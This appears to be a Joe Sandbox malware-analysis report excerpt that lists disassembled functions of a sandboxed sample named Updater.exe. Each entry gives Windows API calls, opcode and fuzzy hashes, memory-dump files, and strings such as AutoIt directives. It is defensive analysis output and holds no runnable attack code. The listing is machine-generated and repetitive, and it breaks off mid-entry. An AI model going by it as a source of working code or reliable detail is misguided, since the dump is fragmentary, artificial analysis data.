Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 2382057038bbe0a192a3147b3f1cf4ac9cfde58d4092890b6be4cb9421b6863f
Instruction ID: 46b802e52b46dd59f9a2801ce6e17ca569af078072325dff8bdac36bf179509c
Opcode Fuzzy Hash: 2382057038bbe0a192a3147b3f1cf4ac9cfde58d4092890b6be4cb9421b6863f
Instruction Fuzzy Hash: 1AF0CD75310309BBEB221FA9EC48F563BBDEF89360F114410FA46D72A1CAB8DC018A60

Function 00736C29 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00736C3D
GetWindowTextW.USER32(00000000,?,00000100), ref: 00736C54
MessageBeep.USER32(00000000), ref: 00736C6C
KillTimer.USER32(?,0000040A), ref: 00736C88
EndDialog.USER32(?,00000001), ref: 00736CA2

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 6bb31d049a6665e7db533fa5868d4c326b49904265cf35f5fc99ee0bccdca115
Instruction ID: a74649b246fdd68b621ad0574c8af3d59e7581cb60b547807ffc140a252a0987
Opcode Fuzzy Hash: 6bb31d049a6665e7db533fa5868d4c326b49904265cf35f5fc99ee0bccdca115
Instruction Fuzzy Hash: BC01A230A10308ABFB315B24DD4EB967778FB00705F008659F587A10E1DBE8BD548AA5

Function 0074116D Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,00740FE5,?,007440D1,?,00000001,00718E5C,?), ref: 00741182
CloseHandle.KERNEL32(?,?,?,?,00740FE5,?,007440D1,?,00000001,00718E5C,?), ref: 0074118F
CloseHandle.KERNEL32(?,?,?,?,00740FE5,?,007440D1,?,00000001,00718E5C,?), ref: 0074119C
CloseHandle.KERNEL32(?,?,?,?,00740FE5,?,007440D1,?,00000001,00718E5C,?), ref: 007411A9
CloseHandle.KERNEL32(?,?,?,?,00740FE5,?,007440D1,?,00000001,00718E5C,?), ref: 007411B6
CloseHandle.KERNEL32(?,?,?,?,00740FE5,?,007440D1,?,00000001,00718E5C,?), ref: 007411C3

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 5754352c1021d8f47ea920f4733d3dd1fe91eda4dd8426efa3d5e2925cbdb516
Instruction ID: ce22943b2ca2d04441869003673e24008f016a2b7655841954be3682b6754a37
Opcode Fuzzy Hash: 5754352c1021d8f47ea920f4733d3dd1fe91eda4dd8426efa3d5e2925cbdb516
Instruction Fuzzy Hash: 8201AE71801B59DFCB30AF66D880812FBF9BF503153158A3ED29652931C3B4A989CF80

Function 0070D56A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0070D582

Part of subcall function 007027F4: RtlFreeHeap.NTDLL(00000000,00000000,?,006DFC79,?,?,006D111E), ref: 0070280A

_free.LIBCMT ref: 0070D594
_free.LIBCMT ref: 0070D5A6
_free.LIBCMT ref: 0070D5B8
_free.LIBCMT ref: 0070D5CA

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: _free$FreeHeap
String ID:
API String ID: 2929853658-0
Opcode ID: 21f5e081538b4b5fe983a45363499d4931e2ab36db77a368af6949be7a02a2f9
Instruction ID: 3f84c4a2608d1b6a7c3c8a2ede6731918281d2c75b0e9e9710e9bc6d4b15a053
Opcode Fuzzy Hash: 21f5e081538b4b5fe983a45363499d4931e2ab36db77a368af6949be7a02a2f9
Instruction Fuzzy Hash: 43F0EC32504204EBC674EB9CE9DAC1677E9AA00724B585A06F508D75C2CA3CFC919B64

Function 00734B6E Relevance: 7.5, APIs: 5, Instructions: 33COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00734B7D
GetParent.USER32 ref: 00734B84
GetWindowLongW.USER32(?,000000F0), ref: 00734B91
GetWindowLongW.USER32(?,000000F0), ref: 00734BA7

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: LongWindow$Parent
String ID:
API String ID: 2125864951-0
Opcode ID: a75db7c2da43a0e91a6bd3e5b70a9b346eaaa8802539fb2d38f7b26dac3bfaf9
Instruction ID: d855a01bd07810053a45848f5b45ba334666b348fddec8eb468ef03e17c8c98d
Opcode Fuzzy Hash: a75db7c2da43a0e91a6bd3e5b70a9b346eaaa8802539fb2d38f7b26dac3bfaf9
Instruction Fuzzy Hash: 8BE09B72709132A77B15162DAC00F5AE59C5E567B4B220360F821F21E5D75CFC0205FD

Function 007020C4 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 007020E2

Part of subcall function 007027F4: RtlFreeHeap.NTDLL(00000000,00000000,?,006DFC79,?,?,006D111E), ref: 0070280A

_free.LIBCMT ref: 007020F4
_free.LIBCMT ref: 00702107
_free.LIBCMT ref: 00702118
_free.LIBCMT ref: 00702129

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: _free$FreeHeap
String ID:
API String ID: 2929853658-0
Opcode ID: c4e5ba2bbcd0154ffb77b1c546a7ece54749dcf3fab18850651fcac5c83335e8
Instruction ID: f277d1c5ca1626f775209eb4b050d44122c00ffb7e64a89b03026cc0a5a420a9
Opcode Fuzzy Hash: c4e5ba2bbcd0154ffb77b1c546a7ece54749dcf3fab18850651fcac5c83335e8
Instruction Fuzzy Hash: AAF03072815210DFDB556F28BD4954A37A4BB4A7603459206F614962F7CB3D0903DB88

Function 00700D68 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 00700F1A
__freea.LIBCMT ref: 00700F38

Part of subcall function 00701358: _free.LIBCMT ref: 00701370

Strings

am/pm, xrefs: 00700F9B
a/p, xrefs: 00700FFF

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: aa0103d2b43da1f6a1807f47566e9dbc8edbb1da9284a182a936486c2163f62b
Instruction ID: 7d1e7ed52cf39050c64feadea6e73fd52cd1f6032ad9ae8b378e5201b2da4a11
Opcode Fuzzy Hash: aa0103d2b43da1f6a1807f47566e9dbc8edbb1da9284a182a936486c2163f62b
Instruction Fuzzy Hash: 45D1043190020ADACB299F68C8957FAB7F1FF05310FA4435AEA55AB2D1D33D9D80DB91

Function 00756DA0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 325COMMON

Download Yara Rule

APIs

Part of subcall function 006F0854: EnterCriticalSection.KERNEL32(007A16CC,?,007A3504,?,006D1535,007A3504), ref: 006F085F
Part of subcall function 006F0854: LeaveCriticalSection.KERNEL32(007A16CC,?,007A3504,?,006D1535,007A3504), ref: 006F089C

Part of subcall function 006F06D4: __onexit.LIBCMT ref: 006F06DA

__Init_thread_footer.LIBCMT ref: 00756E08

Part of subcall function 006F080A: EnterCriticalSection.KERNEL32(007A16CC,007A3504,?,006D154F,007A3504,0071231A), ref: 006F0814
Part of subcall function 006F080A: LeaveCriticalSection.KERNEL32(007A16CC,?,006D154F,007A3504,0071231A), ref: 006F0847

Part of subcall function 00744358: LoadStringW.USER32(00000066,?,00000FFF,?), ref: 007443A0
Part of subcall function 00744358: LoadStringW.USER32(?,?,00000FFF,?), ref: 007443C6

Strings

X3z, xrefs: 00756F23
X3z, xrefs: 00756F3F
X3z, xrefs: 00756F0A

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
String ID: X3z$X3z$X3z
API String ID: 1072379062-444400031
Opcode ID: d01c9d8421a2f3ee41583d32303fc7641c8345301dcadee59fb930806de95d6a
Instruction ID: 48452f1a8025ef2ddba701f005c1e685cde6b69719a36962497db273454f4342
Opcode Fuzzy Hash: d01c9d8421a2f3ee41583d32303fc7641c8345301dcadee59fb930806de95d6a
Instruction Fuzzy Hash: 85C17C71A04109AFCB14DF58D891EFAB7B9FF49310F14806AF9059B291DBB4AD49CB90

Function 014A6C91 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,014A6E5B,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 014A6CC0

Part of subcall function 014A6959: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 014A6977

Strings

eeee, xrefs: 014A6DCB
yyyy, xrefs: 014A6DB2
ggg, xrefs: 014A6DA5

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: ad0c656f96d76dcde6c662c528d2eeaf5b9787f0bed36b8cfe41d670e13aedaa
Instruction ID: dc3fc21214b2ba4570567bcddbef59a1fc6a8d487ccc472af395d6b847cd2f0b
Opcode Fuzzy Hash: ad0c656f96d76dcde6c662c528d2eeaf5b9787f0bed36b8cfe41d670e13aedaa
Instruction Fuzzy Hash: BB4104357001064BE711AA7EC8906FFBBAAEB74150BEF042BE651C7374DA70ED038692

Function 0070154F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\friend\Updater.exe,00000104), ref: 0070158A
_free.LIBCMT ref: 00701655
_free.LIBCMT ref: 0070165F

Strings

C:\Users\user\AppData\Local\friend\Updater.exe, xrefs: 00701581, 00701588, 007015B7, 007015EF

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\friend\Updater.exe
API String ID: 2506810119-1063488248
Opcode ID: f2b9b2a3b8eed6e62c459c1dae7e96d7d4eb50cadb1c4ea7554d140413188e0f
Instruction ID: 9285a8284362dd0c831926922e8fbb4ab0db8f694ec852d76db21c4a7bdbd0c9
Opcode Fuzzy Hash: f2b9b2a3b8eed6e62c459c1dae7e96d7d4eb50cadb1c4ea7554d140413188e0f
Instruction Fuzzy Hash: 8631C3B1A00258EFCB21DF99DC89D9FBBFCEBC5310B544266F40597291DA794E41CB50

Function 0073D017 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,?,00000000,?), ref: 0073D0A0
DeleteMenu.USER32(?,00000007,00000000), ref: 0073D0E6
DeleteMenu.USER32(0073CBE8,?,00000000,0073CBE8,00000000,00000000,?,00000000), ref: 0073D12F

Strings

0, xrefs: 0073D079

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 00d2cb3e5e8565115b9a0723c18453c017d64655f3221df455441031e36d8d6f
Instruction ID: 94dfe13517d37537191a9fe5f0fb95022005fa315554a3268a93fa6bf3339c00
Opcode Fuzzy Hash: 00d2cb3e5e8565115b9a0723c18453c017d64655f3221df455441031e36d8d6f
Instruction Fuzzy Hash: 2541DD70604305DFE730DF28E884B2ABBE9AF85310F05461DF466972D2D738AD04CB66

Function 00764DDC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0076D938,00000000,?,?,?,?), ref: 00764E70
GetWindowLongW.USER32 ref: 00764E8D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00764E9D

Strings

SysTreeView32, xrefs: 00764E42

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 374dadba749a42b5ff3c88d7c5931196e992fc2c70851bfb72228a708e22ed77
Instruction ID: 8ad86c25fb1d11161a239b3a3df8c5e4175234cde03a05a1ea1a1ca2adfcf389
Opcode Fuzzy Hash: 374dadba749a42b5ff3c88d7c5931196e992fc2c70851bfb72228a708e22ed77
Instruction Fuzzy Hash: 54317C31600605AFDB259E78DC45BEA7BA9FB08324F244329FD7A931E0CB79EC518B54

Function 0073A36D Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0073A3DE

Strings

#requireadmin, xrefs: 0073A39B
#notrayicon, xrefs: 0073A378
#OnAutoItStartRegister, xrefs: 0073A3B5

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: 70db088fee353531c7437e96beb1c6b82b6731427249d7dd3ba881496740f7af
Instruction ID: 1b4810ab3530cc708accd4d90bbc3b58a5d41a97b8664142b5a959efe32123d7
Opcode Fuzzy Hash: 70db088fee353531c7437e96beb1c6b82b6731427249d7dd3ba881496740f7af
Instruction Fuzzy Hash: B1213732105665BAF221B7289C07FBB73D99F51340F24842DF58587183FBE99D8183AB

Function 0076486F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 007648F7
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0076490B
SendMessageW.USER32(?,00001002,00000000,?), ref: 0076492F

Strings

SysMonthCal32, xrefs: 007648C2

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 339fa5d2f3016b8b601f7d56876cdfc9ccaf881f0e5bfbbc26a50242f4e6c244
Instruction ID: 26f11c2165edfaca27ffcffa834c1de9773a87427c60228413c6e1a22de142bd
Opcode Fuzzy Hash: 339fa5d2f3016b8b601f7d56876cdfc9ccaf881f0e5bfbbc26a50242f4e6c244
Instruction Fuzzy Hash: EB219132640219BBDF118E54CC86FEA3B79EF48724F114214FE166B1D0D6B9AC559BA0

Function 00765020 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 007650D7
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 007650E5
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 007650EC

Strings

msctls_updown32, xrefs: 00765051

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 535aa7b660b165159fc40d12c3ec33b029a3cf0edbac57811f8000f22924dd6a
Instruction ID: 18ebaa51a8913810a6bcd6339760a004b1ea3f7e5e03b7538df33c156d4ebc7a
Opcode Fuzzy Hash: 535aa7b660b165159fc40d12c3ec33b029a3cf0edbac57811f8000f22924dd6a
Instruction Fuzzy Hash: B72181B5600609AFDB10DF28CCC1D7737ADEB8A394B144159FA029B291CB75EC02DAA0

Function 0076414F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 007641D8
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007641E8
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 0076420E

Strings

Listbox, xrefs: 007641A7

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 71812092700b58c47c8e1ebde67b9a7e225a6809f9eb13bee19448c313fc0c81
Instruction ID: bc7798f0d564fc8caf91bb28c9f66210a60902968715b31e0a1b0fdc388b2a0d
Opcode Fuzzy Hash: 71812092700b58c47c8e1ebde67b9a7e225a6809f9eb13bee19448c313fc0c81
Instruction Fuzzy Hash: F821C272610218BFDF158F54CC85EAB37AEEF9A754F108124F9069B190CA79DC5287A0

Function 00745594 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 007455A8
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 007455FC
SetErrorMode.KERNEL32(00000000), ref: 00745670

Strings

%lu, xrefs: 0074560F

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: c0286c7f87a1828033aacc3e6b99cd10e0d557a1c9de73ff153f8c55410a8b10
Instruction ID: 6d1deeb09cb36f572c4fe64406bd4fc3a8a2686c33e53fa1894f9b7046d25813
Opcode Fuzzy Hash: c0286c7f87a1828033aacc3e6b99cd10e0d557a1c9de73ff153f8c55410a8b10
Instruction Fuzzy Hash: EE318170A00208AFDB10DF54C984EAA77F9EF08304F158099F909DB352DB75EE45CB62

Function 00764BA4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00764C08
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00764C1D
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00764C2A

Strings

msctls_trackbar32, xrefs: 00764BDF

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: a0392e244d3812ea8b74426389afe98efbd20cde7fd38725ca71daecb1240008
Instruction ID: af7576ff582317372859e1860134ccec9d938b1ea5fb3a5a10594ee4466dfdb2
